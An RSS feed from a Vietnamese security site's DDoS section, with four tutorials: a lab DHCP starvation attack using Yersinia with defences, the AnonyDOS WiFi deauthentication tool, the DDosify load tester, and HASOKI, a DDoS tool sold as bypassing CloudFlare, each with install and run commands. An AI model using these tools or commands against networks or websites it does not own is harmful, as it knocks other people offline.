<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:media="http://search.yahoo.com/mrss/" >

<channel>
	<title>DDOS &#8211; AnonyViet</title>
	<atom:link href="https://anonyviet.com/category/security/ddos/feed/" rel="self" type="application/rss+xml" />
	<link>https://anonyviet.com</link>
	<description>Webiste chia sẻ kiến thức công nghệ thông tin, mạng máy tính, bảo mật phổ biến nhất Việt Nam. Luôn cập nhật tin tức, thủ thuật nóng hổi nhất</description>
	<lastBuildDate>Thu, 24 Jul 2025 17:13:18 +0000</lastBuildDate>
	<language>vi</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://anonyviet.com/wp-content/uploads/2018/10/cropped-ico-logo-75x75.png</url>
	<title>DDOS &#8211; AnonyViet</title>
	<link>https://anonyviet.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>DOS ATTACK từ bên trong mạng đến máy chủ DHCP</title>
		<link>https://anonyviet.com/dos-attack-tu-ben-trong-mang-den-may-chu-dhcp/</link>
					<comments>https://anonyviet.com/dos-attack-tu-ben-trong-mang-den-may-chu-dhcp/#comments</comments>
		
		<dc:creator><![CDATA[Ellyx13]]></dc:creator>
		<pubDate>Mon, 22 Apr 2024 23:22:32 +0000</pubDate>
				<category><![CDATA[DDOS]]></category>
		<category><![CDATA[dhcp]]></category>
		<category><![CDATA[Đos]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=40500</guid>

					<description><![CDATA[Bạn có thể lừa máy chủ DHCP không cung cấp địa chỉ IP cho các thiết bị, chặn hoàn toàn các kết nối mới bằng cách thực hiện một cuộc tấn công DoS được gọi là “tấn công đói DHCP”. Mình sẽ hướng dẫn bạn cách thực hiện và cách bảo vệ mạng của bạn. [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Bạn có thể lừa máy chủ DHCP không cung cấp địa chỉ IP cho các thiết bị, chặn hoàn toàn các kết nối mới bằng cách thực hiện một cuộc tấn công DoS được gọi là “<a href="https://vnpro.vn/thu-vien/tan-cong-giao-thuc-dhcp-3133.html" target="_blank" rel="noopener">tấn công đói DHCP</a>”. Mình sẽ hướng dẫn bạn cách thực hiện và cách bảo vệ mạng của bạn.</p>
<p><img fetchpriority="high" decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2022/03/Untitled-Diagram.png" alt="DOS ATTACK từ bên trong mạng đến máy chủ DHCP" width="654" height="348" title="DOS ATTACK từ bên trong mạng đến máy chủ DHCP 9"></p>
<h2>Tấn công DoS vào máy chủ DHCP</h2>
<p>DHCP là một giao thức dùng để cấu hình tự động các thiết bị. Thông thường, chúng là các thiết bị đầu cuối như máy tính, điện thoại hoặc máy in nhận địa chỉ IP, mask, default gateway,  DNS,&#8230; nhờ DHCP.</p>
<p>Nhưng điều gì sẽ xảy ra khi ai đó ngăn cản cơ chế này hoạt động? Sẽ không có kết nối mạng cũng như kết nối internet. Chúng ta gọi kiểu tấn công này là <a href="https://anonyviet.com/category/security/ddos/">tấn công DoS</a> (Tấn công từ chối dịch vụ).</p>
<p>Cuộc tấn công được gọi là “tấn công đói DHCP” dựa trên thực tế là mỗi máy chủ DHCP có số lượng địa chỉ IP được xác định chính xác có thể được cấp cho các thiết bị. Ví dụ: mạng con có thể là 192.168.0.0/24, đại diện cho một phạm vi tối đa là 253 địa chỉ có thể sử dụng cho máy khách.</p>
<p>Nhưng khi kẻ tấn công yêu cầu tất cả các địa chỉ IP có sẵn bằng cách ghi đè một số lượng lớn các địa chỉ MAC không có thật, máy chủ sẽ không có bất kỳ địa chỉ IP nào cung cấp cho các thiết bị mới.</p>
<p>Cuộc tấn công này thậm chí còn tạo cơ hội cho kẻ tấn công nắm bắt được lưu lượng truy cập. Sau khi tắt máy chủ DHCP, kẻ tấn công có thể chuyển sang máy chủ DHCP của riêng mình. Ví dụ: một máy chủ DNS giả mạo có thể được cung cấp trong cấu hình DHCP để tấn công bạn. Mình thấy đây là một cuộc tấn công nguy hiểm.</p>
<h2>Mô phỏng cuộc tấn công</h2>
<p>Mình sẽ cho bạn thấy cách thực hiện cuộc tấn công này dễ như thế nào. Mình sẽ sử dụng router và laptop của Cisco với bản phân phối KALI Linux để thử nghiệm. Mình sẽ sử dụng một công cụ có tên là Yersinia.</p>
<h2>Cấu hình cơ bản của máy chủ DHCP trên bộ định tuyến CISCO</h2>
<pre>ip dhcp excluded-address 192.168.0.1
 !
 ip dhcp pool LAN
 network 192.168.0.0 255.255.255.0
 default-router 192.168.0.1
 dns-server 8.8.8.8</pre>
<p>Sau khi kết nối trạm đầu tiên, mình thấy một địa chỉ IP được chỉ định.</p>
<pre>R1-NETVEL#show ip dhcp binding</pre>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/03/DHCP-binding-inicial.png" alt="DOS ATTACK từ bên trong mạng đến máy chủ DHCP 8" width="624" height="98" title="DOS ATTACK từ bên trong mạng đến máy chủ DHCP 10"></p>
<p>Mình cũng thấy một lượng nhỏ các yêu cầu DHCP đến với bộ định tuyến.</p>
<pre>R1-NETVEL#show ip dhcp server statistics</pre>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/03/DHCP-statistics-init.png" alt="DOS ATTACK từ bên trong mạng đến máy chủ DHCP 9" width="329" height="370" title="DOS ATTACK từ bên trong mạng đến máy chủ DHCP 11"></p>
<p>Và chỉ một địa chỉ IP được chỉ định</p>
<pre>R1-NETVEL#show ip dhcp pool</pre>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/03/DHCP-pool-init.png" alt="DOS ATTACK từ bên trong mạng đến máy chủ DHCP 10" width="605" height="178" title="DOS ATTACK từ bên trong mạng đến máy chủ DHCP 12"></p>
<h2>Khởi động cuộc tấn công</h2>
<p>Mình sẽ sử dụng công cụ Yersinia. Bạn cũng có thể thực hiện việc này thông qua CLI, nhưng trong trường hợp này, mình thích GUI hơn. Bạn có thể mở nó bằng lệnh sau.</p>
<pre>root@kali:~#yersinia -G</pre>
<p>Hoặc bạn cũng có thể khởi động cuộc tấn công bằng vài cú click chuột thông qua giao diện đồ hoạ.</p>
<p>Bắt đầu: Khởi động cuộc tấn công -&gt; gửi gói KHÁM PHÁ</p>
<p>Dừng: Liệt kê các cuộc tấn công -&gt; Hủy cuộc tấn công</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/03/yersinia.jpg" alt="DOS ATTACK từ bên trong mạng đến máy chủ DHCP 11" width="857" height="496" title="DOS ATTACK từ bên trong mạng đến máy chủ DHCP 13"></p>
<p>Sau một thời gian, máy chủ DHCP sẽ có nhiều yêu cầu hơn khả năng nó có thể xử lý. Đó là tấn công DoS.</p>
<pre>R1-NETVEL#show ip dhcp binding</pre>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/03/DHCP-binding-post.png" alt="DOS ATTACK từ bên trong mạng đến máy chủ DHCP 12" width="623" height="414" title="DOS ATTACK từ bên trong mạng đến máy chủ DHCP 14"></p>
<pre>R1-NETVEL#show ip dhcp server statistics</pre>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/03/DHCP-statistics-post.png" alt="DOS ATTACK từ bên trong mạng đến máy chủ DHCP 13" width="327" height="369" title="DOS ATTACK từ bên trong mạng đến máy chủ DHCP 15"></p>
<pre>R1-NETVEL#show ip dhcp pool</pre>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/03/DHCP-pool-post.png" alt="DOS ATTACK từ bên trong mạng đến máy chủ DHCP 14" width="597" height="175" title="DOS ATTACK từ bên trong mạng đến máy chủ DHCP 16"></p>
<p>Như chúng ta thấy, cách tấn công tương đối đơn giản, nhưng rất nguy hiểm. Nó có thể được ngăn chặn bằng nhiều cách, chẳng hạn như giới hạn số lượng địa chỉ MAC đi qua cổng (bảo mật cổng) hoặc nếu chúng ta muốn ngăn kẻ tấn công cung cấp máy chủ DHCP của riêng mình, chúng ta có thể triển khai DHCP snooping.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Tấn công &#8220;đói DHCP&#8221; là gì và nó hoạt động như thế nào?</h3>
<p>Tấn công &#8220;đói DHCP&#8221; là một loại tấn công DoS (từ chối dịch vụ) nhắm vào máy chủ DHCP. Kẻ tấn công gửi một lượng lớn yêu cầu địa chỉ IP giả mạo, làm cạn kiệt nguồn địa chỉ IP khả dụng của máy chủ và ngăn cản các thiết bị hợp pháp nhận được địa chỉ IP, dẫn đến mất kết nối mạng.</p>
<h3>Tôi có thể làm gì để bảo vệ mạng của mình khỏi tấn công &#8220;đói DHCP&#8221;?</h3>
<p>Bạn có thể áp dụng các biện pháp như giới hạn số lượng địa chỉ MAC được phép truy cập, triển khai DHCP snooping để kiểm soát lưu lượng DHCP, và sử dụng các giải pháp tường lửa để lọc các yêu cầu DHCP bất thường.</p>
<h3>Công cụ nào được sử dụng trong bài viết để mô phỏng cuộc tấn công &#8220;đói DHCP&#8221;?</h3>
<p>Bài viết sử dụng công cụ Yersinia trên hệ điều hành Kali Linux để mô phỏng cuộc tấn công.  Yersinia cung cấp giao diện đồ họa thuận tiện để thực hiện và quản lý cuộc tấn công.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/dos-attack-tu-ben-trong-mang-den-may-chu-dhcp/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
		<item>
		<title>AnonyDOS &#8211; Công cụ DOS mạng WiFi</title>
		<link>https://anonyviet.com/anonydos-cong-cu-dos-mang-wifi/</link>
					<comments>https://anonyviet.com/anonydos-cong-cu-dos-mang-wifi/#comments</comments>
		
		<dc:creator><![CDATA[Hevin]]></dc:creator>
		<pubDate>Sun, 03 Jul 2022 23:03:09 +0000</pubDate>
				<category><![CDATA[DDOS]]></category>
		<category><![CDATA[AnonyDOS]]></category>
		<category><![CDATA[dos wifi]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=40700</guid>

					<description><![CDATA[AnonyDOS là một công cụ được tạo ra bởi tác giả sonvan1811 và được đăng tải trên GitHub. Công cụ này cho phép các bạn tạo ra một công tấn công làm tắc nghẽn WiFi khiến cho mạng bị mất kết nối và hủy xác thực tất cả các thiết bị khi kết nối. Ngoài [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong><span style="vertical-align: inherit;"><span style="vertical-align: inherit;">AnonyDOS</span></span></strong><span style="vertical-align: inherit;"><span style="vertical-align: inherit;"> là một công cụ được tạo ra bởi tác giả sonvan1811 và được đăng tải trên GitHub. Công cụ này cho phép các bạn tạo ra một công tấn công làm tắc nghẽn WiFi khiến cho mạng bị mất kết nối và hủy xác thực tất cả các thiết bị khi kết nối. Ngoài ra, AnonyDOS được viết bằng ngôn ngữ Python và công cụ này được tấn công bằng phương thức </span></span><a href="https://en.wikipedia.org/wiki/Wi-Fi_deauthentication_attack" target="_blank" rel="noopener"><span style="vertical-align: inherit;"><span style="vertical-align: inherit;">WiFi Deauth</span></span></a><span style="vertical-align: inherit;"><span style="vertical-align: inherit;">. </span></span></p>
<p><span style="vertical-align: inherit;"><span style="vertical-align: inherit;">Đây là một phương thức tấn công giữa vào bộ định tuyến và thiết bị kết nối. Không những vậy, cuộc tấn công này cực kì tàn ác buộc các thiết bị của nạn nhân kết nối với một điểm truy cập vào mạng của hacker sau đó hacker có thể nắm bắt các gói mạng được truyền giữa máy của nạn nhân và các điểm truy cập khác, người ta còn có tên gọi khác là kiểu tấn công Evil Twin Attack. Nhưng tool này chỉ là một công cụ chỉ hỗ trợ DOS WiFi, chứ không tạo được điểm truy cập giả. Vậy còn chờ gì nữa chúng ta hãy khám phá tool thú vị này nhé</span></span></p>
<p><span style="color: #ff0000;"><strong><span style="vertical-align: inherit;"><span style="vertical-align: inherit;">Lưu ý: Công cụ này chỉ mang mục đích thử nghiệm và nghiên cứu vui lòng các bạn không sử dụng tool này vào mọi hành vi xấu. Các mọi hành vi bất hợp pháp của các bạn thì Anonyviet sẽ không chịu trách nhiệm</span></span></strong></span></p>
<h2><span style="color: #0000ff;"><strong><span style="vertical-align: inherit;"><span style="vertical-align: inherit;">Cài đặt và sử dụng công cụ AnonyDOS</span></span></strong></span></h2>
<p><span style="vertical-align: inherit;"><span style="vertical-align: inherit;">Để cài đặt công cụ chúng ta hãy mở terminal và nhập lệnh sau:</span></span></p>
<p><code>git clone https://github.com/sonvan1811/AnonyDOS.git</code></p>
<p><code>cd AnonyDOS</code></p>
<p><code>sudo python3 AnonyDOS.py</code></p>
<p><span style="vertical-align: inherit;"><span style="vertical-align: inherit;"><span style="vertical-align: inherit;"><span style="vertical-align: inherit;">sau khi cài đặt xong chúng ta chạy tool với quyền sudo:</span></span></span></span><code>sudo python3 AnonyDOS.py</code></p>
<p><span style="vertical-align: inherit;"><span style="vertical-align: inherit;"><span style="vertical-align: inherit;">Khi bạn mở tool ra thì sẽ có yêu cầu là cắm bộ điều hợp wifi của bạn vào thì mới dùng được tool nha. Còn ai chưa có bộ điều hợp thì có thể mua một con TP LINK W722N và cài driver cho nó</span></span></span><a href="https://anonyviet.com/cai-driver-usb-wifi-tp-link-722n-cho-kali-linux-bang-rtl8188eus-script/"><span style="vertical-align: inherit;"><span style="vertical-align: inherit;"><span style="vertical-align: inherit;"> tại đây</span></span></span></a><span style="vertical-align: inherit;"><span style="vertical-align: inherit;"><span style="vertical-align: inherit;">. Và ở đây thì mình đã cắm bộ điều hợp mạng rùi nên mình sẽ chọn bộ điều hợp đó là số <strong>0.</strong></span></span></span></p>
<p><a href="https://anonyviet.com/wp-content/uploads/2022/06/AnonyDOS.png"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2022/06/AnonyDOS.png" alt="AnonyDOS" width="729" height="386" title="AnonyDOS - Công cụ DOS mạng WiFi 20"></a></p>
<p><span style="vertical-align: inherit;"><span style="vertical-align: inherit;"><span style="vertical-align: inherit;">Sau khi các bạn chọn bộ điều hợp mạng xong thì tool sẽ tiến hành quét các wifi ở xung quanh. Để dừng scan thì các bạn nhấn tổ hợp phím Ctrl + C để dừng và sau đó chọn mạng mà bạn muốn tấn công</span></span></span></p>
<p><a href="https://anonyviet.com/wp-content/uploads/2022/06/Screenshot-85.png"><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2022/06/Screenshot-85.png" alt="AnonyDOS - Công cụ DOS mạng WiFi" width="1012" height="452" title="AnonyDOS - Công cụ DOS mạng WiFi 21"></a></p>
<p><span style="vertical-align: inherit;"><span style="vertical-align: inherit;">Sau khi chọn mạng tấn công, công cụ này sẽ chạy một câu lệnh cơ bản của aircrack-ng đó là aireplay-ng nó sẽ bắt đầu gửi liên tục gói tin đến mạng WiFi bị tấn công dẫn đến tình trạng không thể kết nối mạng và các thiết bị kết nối sẽ bị đẩy ra khỏi mạng đó hay còn gọi là DOS WiFi</span></span></p>
<p><a href="https://anonyviet.com/wp-content/uploads/2022/06/Screenshot-86.png"><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2022/06/Screenshot-86.png" alt="Cài đặt và sử dụng công cụ AnonyDOS" width="1012" height="454" title="AnonyDOS - Công cụ DOS mạng WiFi 22"></a></p>
<p><strong><span style="vertical-align: inherit;"><span style="vertical-align: inherit;">Đúng là một công cụ thú vị nhỉ. Mình cũng xin nhắc lại rằng không nên sử dụng tool này vào mục đích xấu nha, thay vì đó bạn hãy nghiên cứu code và làm quen các module của Python sẽ tốt hơn rất nhiều </span></span></strong></p>
<p><em><strong><span style="vertical-align: inherit;"><span style="vertical-align: inherit;">Bạn có thể đọc thêm bài viết </span></span><a href="https://anonyviet.com/cai-driver-usb-wifi-tp-link-722n-cho-kali-linux-bang-rtl8188eus-script/"><span style="vertical-align: inherit;"><span style="vertical-align: inherit;">Cách cài driver usb wifi tp-link wn722n cho kali linux bằng rtl8188eus script</span></span></a><span style="vertical-align: inherit;"><span style="vertical-align: inherit;"> trên Anonyviet</span></span></strong></em></p>
<h2>Câu hỏi thường gặp</h2>
<h3>AnonyDOS hoạt động như thế nào?</h3>
<p>AnonyDOS sử dụng phương thức WiFi Deauth để tấn công mạng WiFi, gửi liên tục các gói tin làm gián đoạn kết nối và đẩy các thiết bị ra khỏi mạng.  Nó không tạo điểm truy cập giả mạo.</p>
<h3>Tôi cần những gì để sử dụng AnonyDOS?</h3>
<p>Bạn cần một bộ điều hợp WiFi (ví dụ như TP-LINK W722N) và đã cài đặt driver phù hợp.  Cần quyền truy cập root (sudo) để chạy công cụ.</p>
<h3>Tôi có thể sử dụng AnonyDOS vào mục đích gì?</h3>
<p>Công cụ này chỉ dành cho mục đích nghiên cứu và thử nghiệm.  Việc sử dụng AnonyDOS vào các hoạt động bất hợp pháp là trái pháp luật và người dùng tự chịu trách nhiệm.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/anonydos-cong-cu-dos-mang-wifi/feed/</wfw:commentRss>
			<slash:comments>4</slash:comments>
		
		
			</item>
		<item>
		<title>DDosify &#8211; Công cụ kiểm tra sức chịu tải DDoS của Website</title>
		<link>https://anonyviet.com/ddosify-cong-cu-kiem-tra-suc-chiu-tai-ddos-cua-website/</link>
					<comments>https://anonyviet.com/ddosify-cong-cu-kiem-tra-suc-chiu-tai-ddos-cua-website/#respond</comments>
		
		<dc:creator><![CDATA[Wdchocopie]]></dc:creator>
		<pubDate>Thu, 30 Jun 2022 23:58:20 +0000</pubDate>
				<category><![CDATA[DDOS]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[sofware]]></category>
		<category><![CDATA[testing]]></category>
		<category><![CDATA[Website]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=41988</guid>

					<description><![CDATA[DDosify là công cụ tấn công DDoS vào Website giúp bạn kiểm thử khả năng chịu tải của hệ thống. Dạo gần đây có 1 số Website của việt nam đã bị DDos nhiều lần và việc bị DDos cũng làm cho những bạn sở hữu website hoặc làm admin của 1 trang web chẳng [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>DDosify là công cụ tấn công DDoS vào Website giúp bạn kiểm thử khả năng chịu tải của hệ thống. Dạo gần đây có 1 số Website của việt nam đã bị DDos nhiều lần và việc bị DDos cũng làm cho những bạn sở hữu website hoặc làm admin của 1 trang web chẳng mấy vui vẻ gì. Vậy nếu các bạn cũng là 1 Owner hoặc Admin của 1 trang web nào đó mà các bạn muốn kiểm tra khả năng chịu đựng của website và khả năng xử lí của phần mềm chống DDos thì các bạn đến đúng nơi rồi đấy. Hôm nay mình sẽ hướng dẫn các bạn cách cài đặt và sử dụng DDosify để kiểm tra trang web của bạn nhé!</strong></p>
<h2>Dos là gì? DDos là gì? Sự khác nhau giữa Dos và DDos</h2>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/06/tan-cong-tu-choi-dich-vu-dos-1.jpg" alt="Sự khác nhaiu giữa dos và ddos" width="650" height="424" title="DDosify - Công cụ kiểm tra sức chịu tải DDoS của Website 26"></p>
<ul>
<li>DoS là tấn công làm nghẽn máy chủ từ 1 IP/nguồn duy nhất</li>
<li>DDoS là tấn công từ nhiều IP khác nhau mục tiêu.</li>
</ul>
<p>Như vậy có thể thấy DDoS sẽ có mức nguy hiểm gấp nhiều lần sao với DoS, và khả năng ngăn chặn DDoS cũng khó hơn.</p>
<p><strong>Các bạn có thể xem thêm tài liệu tại bài viết</strong>: <a href="https://anonyviet.com/tan-cong-ddos-la-gi/">Tấn công DDoS là gì?</a></p>
<h2>DDosify là gì? Công dụng của nó là gì?</h2>
<p>Vậy thì hãy đi tới công cụ được giới thiệu của bải viết này: <a href="https://github.com/ddosify/ddosify" target="_blank" rel="noopener">DDosify</a>. Nó cho phép người sử dụng tiến hành các cuộc kiểm thử sức chịu đựng của website trong thời gian ngắn và trả về báo cáo cho chúng ta.</p>
<figure style="width: 1886px" class="wp-caption aligncenter"><img decoding="async" src="https://raw.githubusercontent.com/ddosify/ddosify/master/assets/ddosify-quick-start.gif" alt="DDosify - Công cụ kiểm tra khả năng chịu đựng DDoS của Website" width="1886" height="954" title="DDosify - Công cụ kiểm tra sức chịu tải DDoS của Website 27"><figcaption class="wp-caption-text">Chạy thử ddosify</figcaption></figure>
<p>Tới hiện tại, DDosify đã hỗ trợ các cuộc tấn công vào các giao thức HTTP, HTTPS, HTTP/2. Trong tương lai, họ sẽ phát triển thêm các giao thức mới hơn và không chỉ giới hạn ở các cuộc tấn công Layer7 mà còn có cả Layer4. Đồng thời DDosify cũng cung cấp cho chúng ta nhiều loại loadtype để chúng ta có thể tiến hành tấn công.</p>
<h2>Hướng dẫn cài đặt và sử dụng cho DDosify</h2>
<h3>Hướng dẫn cài đặt</h3>
<p><strong>Lưu ý:</strong> Các bạn hãy chọn cách cài đặt phù hợp với bạn nhất nhé! Không cần phải làm tất cả các cách ở phía bên dưới nhé!</p>
<p><strong>Sử dụng docker</strong></p>
<p><code>docker run -it --rm ddosify/ddosify</code></p>
<p><strong>Sử dụng Homebrew</strong></p>
<p><code>brew install ddosify/tap/ddosify</code></p>
<p><strong>Sử dụng linux package</strong></p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic"># Redhat (Fedora, CentOS, RHEL,...)
rpm -i https://github.com/ddosify/ddosify/releases/latest/download/ddosify_amd64.rpm

# Debian (Ubuntu, Linux Mint,...)
wget https://github.com/ddosify/ddosify/releases/latest/download/ddosify_amd64.deb
dpkg -i ddosify_amd64.deb

# Alpine
wget https://github.com/ddosify/ddosify/releases/latest/download/ddosify_amd64.apk
apk add --allow-untrusted ddosify_amd64.apk

# Arch Linux
git clone https://aur.archlinux.org/ddosify.git
cd ddosify
makepkg -sri</pre>
<p><strong>Cài đặt cho window</strong></p>
<p>Câu lệnh khởi chạy <code>.\ddosify.exe</code></p>
<p><strong>Bước 1</strong>: các bạn truy cập vào trang <a href="https://github.com/ddosify/ddosify/releases/tag/v0.8.0" target="_blank" rel="noopener">Release page</a> và tìm tới file<code>ddosify_[Số phiên bản]_Windows_[Computer architecture].zip</code> và tải nó về</p>
<p><strong>Bước 2</strong>: Các bạn giải nén file zip vừa tải về</p>
<p><strong>Bước 3</strong>: Các bạn mở Command Prompt của máy bạn lên và sử dụng lệnh sau trỏ về thư mục đúng của bạn</p>
<p><code>cd [đường dẫn tới thư mục]</code></p>
<p><strong>Sử dụng script cài đặt sẵn (Sử dụng cho linux và MacOS</strong></p>
<p><strong>Yêu cầu</strong>: Phải có 2 package:<code>Curl</code>và <code>Sudo</code></p>
<p><code>curl -sSfL https://raw.githubusercontent.com/ddosify/ddosify/master/scripts/install.sh | sh </code></p>
<p><strong>Sử dụng Go Install</strong></p>
<p><code>go install -v go.ddosify.com/ddosify@latest</code></p>
<h3>Hướng dẫn sử dụng</h3>
<p>Để kiểm tra website, các bạn hãy chạy câu lệnh sau đây</p>
<p><code> ddosify -t [URL của bạn]</code></p>
<p>Chẳng hạn mình muốn kiểm tra trang web Anonyviet.com thì câu lệnh của mình là</p>
<p><code>ddosify -t https://anonyviet.com/</code></p>
<p>Và đây là kết quả sau khi mình kiểm tra</p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2022/06/a.jpg" alt="Kết quả sau khi kiểm tra" width="394" height="366" title="DDosify - Công cụ kiểm tra sức chịu tải DDoS của Website 28"></p>
<p><strong>Cấu trúc câu lệnh sẽ là</strong></p>
<p><code>ddosify [Flag]</code></p>
<p><strong>Và các Flag của nó bao gồm:</strong></p>
<ul>
<li><strong>t: </strong>Mục tiêu của bạn. ví dụ: https://anonyviet.com/</li>
<li><strong>n: </strong>tổng Request mà bạn muốn thử</li>
<li><strong>d: </strong>Thời gian cho chạy phần mềm</li>
<li><strong>p: </strong>Giao thức cần kiểm tra. Bao gồm: HTTP, HTTPS. HTTP/2</li>
<li><strong>m:</strong> Phương thức Request. Bao gồm: <em>GET, POST, PUT, DELETE, HEAD, PATCH, OPTIONS</em></li>
<li><strong>b: </strong>Payload của network packet.</li>
<li><strong>a: </strong>Basic authentication. Ví dụ: <code>-a username:password</code></li>
<li><strong>h: </strong>Header của Request. Ví dụ: <code>-h 'Accept: text/html'</code></li>
<li><strong>T: </strong>Thời gian timeout của từng request</li>
<li><strong>P: </strong>Thêm Proxy cho cuộc kiểm tra. Ví dụ:<code>-P http://user:pass@proxy_host.com:port'</code></li>
<li><strong>o: </strong>Output của quá trình kiểm tra</li>
<li><strong>l: </strong>Loại của Loadtest. Bao gồm: linear, incremental, waved</li>
<li><strong>config:</strong> <a href="https://github.com/ddosify/ddosify#config-file" target="_blank" rel="noopener">Config file.</a> Các bạn có thể xem thêm tại đây</li>
<li><strong>version: </strong>Kiểm tra phiên bản của Ddosify</li>
</ul>
<p><strong>1 câu lệnh mẫu sử dụng 1 vài chức năng vừa nêu trên</strong></p>
<p><code> ddosify -t target_site.com -n 1000 -d 20 -p HTTPS -m PUT -T 7 -P http://proxy_server.com:80</code></p>
<h2>Câu hỏi thường gặp</h2>
<h3>DDosify có an toàn khi sử dụng để kiểm tra website của tôi không?</h3>
<p>DDosify là công cụ kiểm tra tải, không phải công cụ tấn công thực sự. Việc sử dụng nó để kiểm tra website của bạn chỉ nhằm mục đích đánh giá khả năng chịu tải, không gây hại nếu sử dụng đúng cách và với cường độ hợp lý.</p>
<h3>Tôi có cần kiến thức lập trình để sử dụng DDosify?</h3>
<p>Không cần thiết. DDosify cung cấp giao diện dòng lệnh đơn giản, dễ sử dụng.  Bạn chỉ cần hiểu các tham số cơ bản để thực hiện lệnh kiểm tra.</p>
<h3>DDosify hỗ trợ những loại tấn công nào?</h3>
<p>Hiện tại, DDosify hỗ trợ các cuộc tấn công vào giao thức HTTP, HTTPS, HTTP/2.  Nhà phát triển đang tiếp tục cập nhật và bổ sung các giao thức khác trong tương lai.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/ddosify-cong-cu-kiem-tra-suc-chiu-tai-ddos-cua-website/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>HASOKI &#8211; Công cụ DDoS Website Bypass CloudFlare</title>
		<link>https://anonyviet.com/hasoki-cong-cu-ddos-website-bypass-cloudflare/</link>
					<comments>https://anonyviet.com/hasoki-cong-cu-ddos-website-bypass-cloudflare/#comments</comments>
		
		<dc:creator><![CDATA[Hevin]]></dc:creator>
		<pubDate>Sun, 29 May 2022 23:56:27 +0000</pubDate>
				<category><![CDATA[DDOS]]></category>
		<category><![CDATA[hasoki]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=41490</guid>

					<description><![CDATA[Lưu ý: Bài viết này chỉ mang tính chất giáo dục, mọi hành vi liên quan đến hành vi xấu. Anonyviet sẽ không chịu trách nhiệm tất cả mọi hành vi bất hợp pháp Bài viết ngày hôm nay cũng không có gì đặc biệt nên mình sẽ kết thúc sớm ! Trong bài viết [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><span style="color: #ff0000;"><strong>Lưu ý: Bài viết này chỉ mang tính chất giáo dục, mọi hành vi liên quan đến hành vi xấu. Anonyviet sẽ không chịu trách nhiệm tất cả mọi hành vi bất hợp pháp</strong></span></p>
<p><strong>Bài viết ngày hôm nay cũng không có gì đặc biệt nên mình sẽ kết thúc sớm !</strong></p>
<p>Trong bài viết này hôm nay, mình sẽ giới thiệu cho các bạn một tool DDoS Website mang tên HASOKI, đây là một công cụ mới ra mắt và được sử dụng trên Windows và Linux. Công cụ này được xây dựng bởi tác giả <a href="https://github.com/cutipu" target="_blank" rel="noopener">Cutipu</a> và được đăng tải trên Github. Không chỉ vậy, Hasoki được viết hoàn toàn 100% ngôn ngữ lập trình Python. Trước khi vào bài viết mình muốn các bạn <strong>DDoS là gì ?</strong> thì hãy đọc <strong><a href="https://anonyviet.com/tan-cong-ddos-la-gi/">tại đây</a></strong> nha. Bạn nào muốn tìm hiểu thêm về các phương pháp DDoS của Hasoki thì hãy vào <a href="https://github.com/cutipu/HASOKI.git" target="_blank" rel="noopener">Github này</a>. Giờ thì vào vấn đề chính thôi !!!</p>
<h2><span style="font-size: 14pt; color: #0000ff;"><strong>Hasoki &#8211; DDoS Website cho Windows và Linux</strong></span></h2>
<p>Để cài tool cho Windows thì các bạn hãy tải <a href="https://github.com/cutipu/HASOKI/archive/refs/heads/main.zip" target="_blank" rel="noopener"><strong>ở đây</strong></a> sau đó giải nén và mở CMD trỏ đến thư mục đó, rồi nhập lệnh cài đặt:</p>
<p><code>python setup.py install</code> hoặc <code>python3 setup.py install</code></p>
<p><strong>Bạn cũng có thể dùng lệnh này để cài đặt</strong>: <code>pip install -r requirements.txt</code> hoặc <code>pip3 install -r requirements.txt</code></p>
<p><strong>Trên Linux thì các bạn cài đặt như sau:</strong></p>
<p><span style="color: #222222; font-family: monospace;"><span style="background-color: #e9ebec;">git clone https://github.com/BacNTb/HASOKI</span></span></p>
<p><code>cd HASOKI</code></p>
<p><code>python setup.py install</code>hoặc <code>python3 setup.py install</code></p>
<p><code>python main.py</code> hoặc <code>python3 main.py</code></p>
